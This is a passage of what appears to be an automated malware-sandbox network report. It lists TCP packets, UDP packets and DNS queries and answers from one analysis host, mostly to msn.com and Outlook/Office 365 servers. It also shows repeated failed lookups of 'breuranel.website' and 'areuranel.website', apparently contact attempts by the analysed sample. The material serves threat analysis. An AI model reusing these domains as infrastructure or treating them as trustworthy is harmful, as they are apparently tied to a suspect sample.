                                                                                                                        Oct 12, 2021 00:38:52.763951063 CEST4434980940.97.153.146192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:53.094397068 CEST4434980940.97.153.146192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:53.094536066 CEST49809443192.168.2.440.97.153.146
                                                                                                                        Oct 12, 2021 00:38:53.099283934 CEST49809443192.168.2.440.97.153.146
                                                                                                                        Oct 12, 2021 00:38:53.099319935 CEST4434980940.97.153.146192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:53.099530935 CEST4434980940.97.153.146192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:53.102807999 CEST49809443192.168.2.440.97.153.146
                                                                                                                        Oct 12, 2021 00:38:53.147136927 CEST4434980940.97.153.146192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:53.210722923 CEST4434980940.97.153.146192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:53.210797071 CEST4434980940.97.153.146192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:53.210872889 CEST49809443192.168.2.440.97.153.146
                                                                                                                        Oct 12, 2021 00:38:53.211313963 CEST49809443192.168.2.440.97.153.146
                                                                                                                        Oct 12, 2021 00:38:53.211344957 CEST4434980940.97.153.146192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:53.242980957 CEST49810443192.168.2.452.97.218.66
                                                                                                                        Oct 12, 2021 00:38:53.243016005 CEST4434981052.97.218.66192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:53.243339062 CEST49810443192.168.2.452.97.218.66
                                                                                                                        Oct 12, 2021 00:38:53.244144917 CEST49810443192.168.2.452.97.218.66
                                                                                                                        Oct 12, 2021 00:38:53.244172096 CEST4434981052.97.218.66192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:53.335500956 CEST4434981052.97.218.66192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:53.335656881 CEST49810443192.168.2.452.97.218.66
                                                                                                                        Oct 12, 2021 00:38:53.338426113 CEST49810443192.168.2.452.97.218.66
                                                                                                                        Oct 12, 2021 00:38:53.338440895 CEST4434981052.97.218.66192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:53.338664055 CEST4434981052.97.218.66192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:53.341274023 CEST49810443192.168.2.452.97.218.66
                                                                                                                        Oct 12, 2021 00:38:53.387140989 CEST4434981052.97.218.66192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:53.390415907 CEST4434981052.97.218.66192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:53.390476942 CEST4434981052.97.218.66192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:53.390621901 CEST49810443192.168.2.452.97.218.66
                                                                                                                        Oct 12, 2021 00:38:53.390753031 CEST49810443192.168.2.452.97.218.66
                                                                                                                        Oct 12, 2021 00:38:53.390773058 CEST4434981052.97.218.66192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:53.418211937 CEST49811443192.168.2.452.97.137.210
                                                                                                                        Oct 12, 2021 00:38:53.418239117 CEST4434981152.97.137.210192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:53.418344021 CEST49811443192.168.2.452.97.137.210
                                                                                                                        Oct 12, 2021 00:38:53.419348001 CEST49811443192.168.2.452.97.137.210
                                                                                                                        Oct 12, 2021 00:38:53.419358015 CEST4434981152.97.137.210192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:53.513693094 CEST4434981152.97.137.210192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:53.513875961 CEST49811443192.168.2.452.97.137.210
                                                                                                                        Oct 12, 2021 00:38:53.517349958 CEST49811443192.168.2.452.97.137.210
                                                                                                                        Oct 12, 2021 00:38:53.517384052 CEST4434981152.97.137.210192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:53.517685890 CEST4434981152.97.137.210192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:53.520750046 CEST49811443192.168.2.452.97.137.210
                                                                                                                        Oct 12, 2021 00:38:53.563143969 CEST4434981152.97.137.210192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:53.579423904 CEST4434981152.97.137.210192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:53.579551935 CEST4434981152.97.137.210192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:53.579778910 CEST49811443192.168.2.452.97.137.210
                                                                                                                        Oct 12, 2021 00:38:53.580379009 CEST49811443192.168.2.452.97.137.210
                                                                                                                        Oct 12, 2021 00:38:53.580399036 CEST4434981152.97.137.210192.168.2.4
                                                                                                                        Oct 12, 2021 00:39:27.262428045 CEST49827443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:39:27.262460947 CEST4434982713.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:39:27.262573004 CEST49827443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:39:27.263724089 CEST49827443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:39:27.263744116 CEST4434982713.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:39:27.573945999 CEST4434982713.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:39:27.576354027 CEST49827443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:39:27.579360962 CEST49827443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:39:27.579386950 CEST4434982713.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:39:27.579838991 CEST4434982713.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:39:27.583082914 CEST49827443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:39:27.623146057 CEST4434982713.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:39:27.713731050 CEST4434982713.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:39:27.713819027 CEST4434982713.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:39:27.714051008 CEST49827443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:39:27.714366913 CEST49827443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:39:27.714411974 CEST4434982713.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:39:27.714423895 CEST49827443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:39:27.714437008 CEST4434982713.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:39:34.004852057 CEST49829443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:39:34.004887104 CEST4434982913.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:39:34.005809069 CEST49829443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:39:34.005831003 CEST49829443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:39:34.005836010 CEST4434982913.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:39:34.328645945 CEST4434982913.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:39:34.329854965 CEST49829443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:39:34.331669092 CEST49829443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:39:34.331696033 CEST4434982913.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:39:34.332318068 CEST4434982913.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:39:34.335145950 CEST49829443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:39:34.379168034 CEST4434982913.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:39:34.458651066 CEST4434982913.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:39:34.458770037 CEST4434982913.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:39:34.459223032 CEST49829443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:39:34.459450006 CEST49829443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:39:34.459470034 CEST4434982913.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:08.178584099 CEST49860443192.168.2.440.97.153.146
                                                                                                                        Oct 12, 2021 00:40:08.178627968 CEST4434986040.97.153.146192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:08.178735018 CEST49860443192.168.2.440.97.153.146
                                                                                                                        Oct 12, 2021 00:40:08.179379940 CEST49860443192.168.2.440.97.153.146
                                                                                                                        Oct 12, 2021 00:40:08.179399014 CEST4434986040.97.153.146192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:08.504352093 CEST4434986040.97.153.146192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:08.504453897 CEST49860443192.168.2.440.97.153.146
                                                                                                                        Oct 12, 2021 00:40:08.507618904 CEST49860443192.168.2.440.97.153.146
                                                                                                                        Oct 12, 2021 00:40:08.507637024 CEST4434986040.97.153.146192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:08.508140087 CEST4434986040.97.153.146192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:08.511157990 CEST49860443192.168.2.440.97.153.146
                                                                                                                        Oct 12, 2021 00:40:08.555151939 CEST4434986040.97.153.146192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:08.620575905 CEST4434986040.97.153.146192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:08.620656013 CEST4434986040.97.153.146192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:08.620711088 CEST49860443192.168.2.440.97.153.146
                                                                                                                        Oct 12, 2021 00:40:08.624624968 CEST49860443192.168.2.440.97.153.146
                                                                                                                        Oct 12, 2021 00:40:08.624658108 CEST4434986040.97.153.146192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:08.624672890 CEST49860443192.168.2.440.97.153.146
                                                                                                                        Oct 12, 2021 00:40:08.624681950 CEST4434986040.97.153.146192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:08.646941900 CEST49861443192.168.2.452.98.207.194
                                                                                                                        Oct 12, 2021 00:40:08.646996021 CEST4434986152.98.207.194192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:08.647104979 CEST49861443192.168.2.452.98.207.194
                                                                                                                        Oct 12, 2021 00:40:08.647937059 CEST49861443192.168.2.452.98.207.194
                                                                                                                        Oct 12, 2021 00:40:08.647959948 CEST4434986152.98.207.194192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:08.731251955 CEST4434986152.98.207.194192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:08.731384993 CEST49861443192.168.2.452.98.207.194
                                                                                                                        Oct 12, 2021 00:40:08.734852076 CEST49861443192.168.2.452.98.207.194
                                                                                                                        Oct 12, 2021 00:40:08.734880924 CEST4434986152.98.207.194192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:08.735236883 CEST4434986152.98.207.194192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:08.738336086 CEST49861443192.168.2.452.98.207.194
                                                                                                                        Oct 12, 2021 00:40:08.768027067 CEST4434986152.98.207.194192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:08.768098116 CEST4434986152.98.207.194192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:08.768214941 CEST49861443192.168.2.452.98.207.194
                                                                                                                        Oct 12, 2021 00:40:08.768472910 CEST49861443192.168.2.452.98.207.194
                                                                                                                        Oct 12, 2021 00:40:08.768496037 CEST4434986152.98.207.194192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:08.796883106 CEST49862443192.168.2.440.101.124.226
                                                                                                                        Oct 12, 2021 00:40:08.796927929 CEST4434986240.101.124.226192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:08.797008991 CEST49862443192.168.2.440.101.124.226
                                                                                                                        Oct 12, 2021 00:40:08.797677994 CEST49862443192.168.2.440.101.124.226
                                                                                                                        Oct 12, 2021 00:40:08.797691107 CEST4434986240.101.124.226192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:08.892551899 CEST4434986240.101.124.226192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:08.892710924 CEST49862443192.168.2.440.101.124.226
                                                                                                                        Oct 12, 2021 00:40:08.896518946 CEST49862443192.168.2.440.101.124.226
                                                                                                                        Oct 12, 2021 00:40:08.896539927 CEST4434986240.101.124.226192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:08.896852970 CEST4434986240.101.124.226192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:08.900259018 CEST49862443192.168.2.440.101.124.226
                                                                                                                        Oct 12, 2021 00:40:08.943140030 CEST4434986240.101.124.226192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:08.974148989 CEST4434986240.101.124.226192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:08.974239111 CEST4434986240.101.124.226192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:08.974373102 CEST49862443192.168.2.440.101.124.226
                                                                                                                        Oct 12, 2021 00:40:08.974689960 CEST49862443192.168.2.440.101.124.226
                                                                                                                        Oct 12, 2021 00:40:08.974706888 CEST4434986240.101.124.226192.168.2.4

                                                                                                                        UDP Packets

                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Oct 12, 2021 00:38:03.208512068 CEST5585453192.168.2.48.8.8.8
                                                                                                                        Oct 12, 2021 00:38:03.228565931 CEST53558548.8.8.8192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:05.070362091 CEST6454953192.168.2.48.8.8.8
                                                                                                                        Oct 12, 2021 00:38:10.907257080 CEST5299153192.168.2.48.8.8.8
                                                                                                                        Oct 12, 2021 00:38:10.925432920 CEST53529918.8.8.8192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:11.716469049 CEST5370053192.168.2.48.8.8.8
                                                                                                                        Oct 12, 2021 00:38:25.800733089 CEST5653453192.168.2.48.8.8.8
                                                                                                                        Oct 12, 2021 00:38:25.818322897 CEST53565348.8.8.8192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:32.527570009 CEST5662153192.168.2.48.8.8.8
                                                                                                                        Oct 12, 2021 00:38:32.546330929 CEST53566218.8.8.8192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:45.880023956 CEST5504653192.168.2.48.8.8.8
                                                                                                                        Oct 12, 2021 00:38:45.897805929 CEST53550468.8.8.8192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:46.614259958 CEST4961253192.168.2.48.8.8.8
                                                                                                                        Oct 12, 2021 00:38:46.632378101 CEST53496128.8.8.8192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:46.775543928 CEST4928553192.168.2.48.8.8.8
                                                                                                                        Oct 12, 2021 00:38:46.794441938 CEST53492858.8.8.8192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:52.743369102 CEST5060153192.168.2.48.8.8.8
                                                                                                                        Oct 12, 2021 00:38:52.760597944 CEST53506018.8.8.8192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:53.220117092 CEST6087553192.168.2.48.8.8.8
                                                                                                                        Oct 12, 2021 00:38:53.240650892 CEST53608758.8.8.8192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:53.397085905 CEST5644853192.168.2.48.8.8.8
                                                                                                                        Oct 12, 2021 00:38:53.415934086 CEST53564488.8.8.8192.168.2.4
                                                                                                                        Oct 12, 2021 00:39:07.148479939 CEST6242053192.168.2.48.8.8.8
                                                                                                                        Oct 12, 2021 00:39:07.172518015 CEST53624208.8.8.8192.168.2.4
                                                                                                                        Oct 12, 2021 00:39:13.816450119 CEST5018353192.168.2.48.8.8.8
                                                                                                                        Oct 12, 2021 00:39:13.840886116 CEST53501838.8.8.8192.168.2.4
                                                                                                                        Oct 12, 2021 00:39:27.242336988 CEST6153153192.168.2.48.8.8.8
                                                                                                                        Oct 12, 2021 00:39:27.260047913 CEST53615318.8.8.8192.168.2.4
                                                                                                                        Oct 12, 2021 00:39:27.719876051 CEST4922853192.168.2.48.8.8.8
                                                                                                                        Oct 12, 2021 00:39:33.981678963 CEST5979453192.168.2.48.8.8.8
                                                                                                                        Oct 12, 2021 00:39:34.002629995 CEST53597948.8.8.8192.168.2.4
                                                                                                                        Oct 12, 2021 00:39:34.465598106 CEST5591653192.168.2.48.8.8.8
                                                                                                                        Oct 12, 2021 00:39:48.098314047 CEST6054253192.168.2.48.8.8.8
                                                                                                                        Oct 12, 2021 00:39:48.117002010 CEST53605428.8.8.8192.168.2.4
                                                                                                                        Oct 12, 2021 00:39:55.946903944 CEST6068953192.168.2.48.8.8.8
                                                                                                                        Oct 12, 2021 00:39:55.966435909 CEST53606898.8.8.8192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:08.155658960 CEST6420653192.168.2.48.8.8.8
                                                                                                                        Oct 12, 2021 00:40:08.176791906 CEST53642068.8.8.8192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:08.626851082 CEST5090453192.168.2.48.8.8.8
                                                                                                                        Oct 12, 2021 00:40:08.644534111 CEST53509048.8.8.8192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:08.775460958 CEST5752553192.168.2.48.8.8.8
                                                                                                                        Oct 12, 2021 00:40:08.795043945 CEST53575258.8.8.8192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:15.993360043 CEST5381453192.168.2.48.8.8.8
                                                                                                                        Oct 12, 2021 00:40:16.011079073 CEST53538148.8.8.8192.168.2.4

                                                                                                                        DNS Queries

                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                        Oct 12, 2021 00:38:03.208512068 CEST192.168.2.48.8.8.80x8ef2Standard query (0)msn.comA (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:05.070362091 CEST192.168.2.48.8.8.80xc63aStandard query (0)www.msn.comA (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:10.907257080 CEST192.168.2.48.8.8.80x9600Standard query (0)msn.comA (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:11.716469049 CEST192.168.2.48.8.8.80xf4cfStandard query (0)www.msn.comA (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:25.800733089 CEST192.168.2.48.8.8.80x9f0cStandard query (0)breuranel.websiteA (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:32.527570009 CEST192.168.2.48.8.8.80xe0e2Standard query (0)breuranel.websiteA (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:45.880023956 CEST192.168.2.48.8.8.80x9608Standard query (0)outlook.comA (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:46.614259958 CEST192.168.2.48.8.8.80x77eeStandard query (0)www.outlook.comA (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:46.775543928 CEST192.168.2.48.8.8.80x8150Standard query (0)outlook.office365.comA (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:52.743369102 CEST192.168.2.48.8.8.80x6526Standard query (0)outlook.comA (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:53.220117092 CEST192.168.2.48.8.8.80x211dStandard query (0)www.outlook.comA (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:53.397085905 CEST192.168.2.48.8.8.80x4078Standard query (0)outlook.office365.comA (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:39:07.148479939 CEST192.168.2.48.8.8.80xca44Standard query (0)areuranel.websiteA (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:39:13.816450119 CEST192.168.2.48.8.8.80x8a5Standard query (0)areuranel.websiteA (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:39:27.242336988 CEST192.168.2.48.8.8.80x7dbStandard query (0)msn.comA (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:39:27.719876051 CEST192.168.2.48.8.8.80xf46fStandard query (0)www.msn.comA (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:39:33.981678963 CEST192.168.2.48.8.8.80xb117Standard query (0)msn.comA (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:39:34.465598106 CEST192.168.2.48.8.8.80x128dStandard query (0)www.msn.comA (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:39:48.098314047 CEST192.168.2.48.8.8.80x2804Standard query (0)breuranel.websiteA (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:39:55.946903944 CEST192.168.2.48.8.8.80x8958Standard query (0)breuranel.websiteA (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:08.155658960 CEST192.168.2.48.8.8.80xf83Standard query (0)outlook.comA (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:08.626851082 CEST192.168.2.48.8.8.80x901eStandard query (0)www.outlook.comA (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:08.775460958 CEST192.168.2.48.8.8.80x1debStandard query (0)outlook.office365.comA (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:15.993360043 CEST192.168.2.48.8.8.80x8b0cStandard query (0)outlook.comA (IP address)IN (0x0001)

                                                                                                                        DNS Answers

                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                        Oct 12, 2021 00:38:03.228565931 CEST8.8.8.8192.168.2.40x8ef2No error (0)msn.com13.82.28.61A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:05.088568926 CEST8.8.8.8192.168.2.40xc63aNo error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:10.925432920 CEST8.8.8.8192.168.2.40x9600No error (0)msn.com13.82.28.61A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:11.734641075 CEST8.8.8.8192.168.2.40xf4cfNo error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:25.818322897 CEST8.8.8.8192.168.2.40x9f0cName error (3)breuranel.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:32.546330929 CEST8.8.8.8192.168.2.40xe0e2Name error (3)breuranel.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:45.897805929 CEST8.8.8.8192.168.2.40x9608No error (0)outlook.com40.97.116.82A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:45.897805929 CEST8.8.8.8192.168.2.40x9608No error (0)outlook.com40.97.148.226A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:45.897805929 CEST8.8.8.8192.168.2.40x9608No error (0)outlook.com40.97.161.50A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:45.897805929 CEST8.8.8.8192.168.2.40x9608No error (0)outlook.com40.97.156.114A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:45.897805929 CEST8.8.8.8192.168.2.40x9608No error (0)outlook.com40.97.160.2A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:45.897805929 CEST8.8.8.8192.168.2.40x9608No error (0)outlook.com40.97.128.194A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:45.897805929 CEST8.8.8.8192.168.2.40x9608No error (0)outlook.com40.97.164.146A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:45.897805929 CEST8.8.8.8192.168.2.40x9608No error (0)outlook.com40.97.153.146A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:46.632378101 CEST8.8.8.8192.168.2.40x77eeNo error (0)www.outlook.comoutlook.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:46.632378101 CEST8.8.8.8192.168.2.40x77eeNo error (0)outlook.office365.comoutlook.ha.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:46.632378101 CEST8.8.8.8192.168.2.40x77eeNo error (0)outlook.ha.office365.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:46.632378101 CEST8.8.8.8192.168.2.40x77eeNo error (0)outlook.ms-acdc.office.comHHN-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:46.632378101 CEST8.8.8.8192.168.2.40x77eeNo error (0)HHN-efz.ms-acdc.office.com52.97.183.162A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:46.632378101 CEST8.8.8.8192.168.2.40x77eeNo error (0)HHN-efz.ms-acdc.office.com52.97.151.98A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:46.632378101 CEST8.8.8.8192.168.2.40x77eeNo error (0)HHN-efz.ms-acdc.office.com52.97.178.98A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:46.632378101 CEST8.8.8.8192.168.2.40x77eeNo error (0)HHN-efz.ms-acdc.office.com52.97.223.66A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:46.794441938 CEST8.8.8.8192.168.2.40x8150No error (0)outlook.office365.comoutlook.ha.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:46.794441938 CEST8.8.8.8192.168.2.40x8150No error (0)outlook.ha.office365.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:46.794441938 CEST8.8.8.8192.168.2.40x8150No error (0)outlook.ms-acdc.office.comHHN-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:46.794441938 CEST8.8.8.8192.168.2.40x8150No error (0)HHN-efz.ms-acdc.office.com52.97.218.82A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:46.794441938 CEST8.8.8.8192.168.2.40x8150No error (0)HHN-efz.ms-acdc.office.com52.97.151.130A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:46.794441938 CEST8.8.8.8192.168.2.40x8150No error (0)HHN-efz.ms-acdc.office.com52.97.219.162A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:46.794441938 CEST8.8.8.8192.168.2.40x8150No error (0)HHN-efz.ms-acdc.office.com52.98.171.242A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:52.760597944 CEST8.8.8.8192.168.2.40x6526No error (0)outlook.com40.97.153.146A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:52.760597944 CEST8.8.8.8192.168.2.40x6526No error (0)outlook.com40.97.116.82A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:52.760597944 CEST8.8.8.8192.168.2.40x6526No error (0)outlook.com40.97.148.226A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:52.760597944 CEST8.8.8.8192.168.2.40x6526No error (0)outlook.com40.97.161.50A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:52.760597944 CEST8.8.8.8192.168.2.40x6526No error (0)outlook.com40.97.156.114A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:52.760597944 CEST8.8.8.8192.168.2.40x6526No error (0)outlook.com40.97.160.2A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:52.760597944 CEST8.8.8.8192.168.2.40x6526No error (0)outlook.com40.97.128.194A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:52.760597944 CEST8.8.8.8192.168.2.40x6526No error (0)outlook.com40.97.164.146A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:53.240650892 CEST8.8.8.8192.168.2.40x211dNo error (0)www.outlook.comoutlook.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:53.240650892 CEST8.8.8.8192.168.2.40x211dNo error (0)outlook.office365.comoutlook.ha.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:53.240650892 CEST8.8.8.8192.168.2.40x211dNo error (0)outlook.ha.office365.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:53.240650892 CEST8.8.8.8192.168.2.40x211dNo error (0)outlook.ms-acdc.office.comHHN-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:53.240650892 CEST8.8.8.8192.168.2.40x211dNo error (0)HHN-efz.ms-acdc.office.com52.97.218.66A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:53.240650892 CEST8.8.8.8192.168.2.40x211dNo error (0)HHN-efz.ms-acdc.office.com52.97.151.146A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:53.240650892 CEST8.8.8.8192.168.2.40x211dNo error (0)HHN-efz.ms-acdc.office.com52.97.151.2A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:53.240650892 CEST8.8.8.8192.168.2.40x211dNo error (0)HHN-efz.ms-acdc.office.com52.98.208.50A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:53.415934086 CEST8.8.8.8192.168.2.40x4078No error (0)outlook.office365.comoutlook.ha.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:53.415934086 CEST8.8.8.8192.168.2.40x4078No error (0)outlook.ha.office365.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:38:53.415934086 CEST8.8.8.8192.168.2.40x4078No error (0)outlook.ms-acdc.office.comHHN-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
